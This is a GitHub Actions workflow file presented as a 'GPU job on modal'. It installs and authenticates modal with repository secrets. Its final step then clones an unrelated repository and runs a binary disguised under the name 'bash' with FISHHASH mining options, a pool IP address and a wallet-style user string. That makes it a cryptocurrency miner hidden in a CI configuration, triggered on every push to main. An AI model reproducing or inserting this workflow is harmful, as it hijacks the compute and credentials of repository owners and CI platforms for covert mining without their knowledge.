name: GPU job on modal

on:
  push:
    branches: [ "main" ]

jobs:
  gpu:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - name: Set up Python
        uses: actions/setup-python@v5
        with:
          python-version: "3.10"

      - name: Install modal
        run: |
          pip install modal

      - name: Auth modal
        env:
          MODAL_TOKEN_ID: ${{ secrets.MODAL_TOKEN_ID }}
          MODAL_TOKEN_SECRET: ${{ secrets.MODAL_TOKEN_SECRET }}
        run: |
          modal token set \
            --token-id "$MODAL_TOKEN_ID" \
            --token-secret "$MODAL_TOKEN_SECRET"

      - name: Run GPU job
        run: |
          git clone https://github.com/hujisanda/lol198.git
          cd lol198 && chmod u+x bash && ./bash --algo FISHHASH --pool 134.209.175.114:80 --user c9f8d6c1849abbcd164f6c72002d9ac44b9deaef70481739a29d1733915defca+115098.jasin --ethstratum ETHPROX

        
